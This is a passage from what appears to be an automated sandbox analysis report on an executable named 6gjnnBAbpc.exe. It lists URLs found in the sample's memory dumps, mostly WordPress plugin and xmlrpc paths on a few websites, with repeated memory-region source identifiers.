00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/wlwmanifest.xml
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.411734937.0000000008D61000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.418285161.0000000008D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/xmlrpc
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/xmlrpc.php
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D9F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/xmlrpc.php0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.420792610.0000000008E06000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.credo.edu.pl/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.crrcgc.cc/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.421176779.0000000008D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668498308.0000000008D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/CK3
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/T
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.668910445.0000000008D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/d
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/ajax-search-for-woocommerce-premium/assets/css/style.min.css?
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/ajax-search-for-woocommerce-premium/assets/js/search.min.js?v
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/js/scripts.js?ver=2.3.4
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.4
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.4
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.4
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.7.4
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=5.7.4
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/custom.css?ver=6
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/jquery.qtip.min.
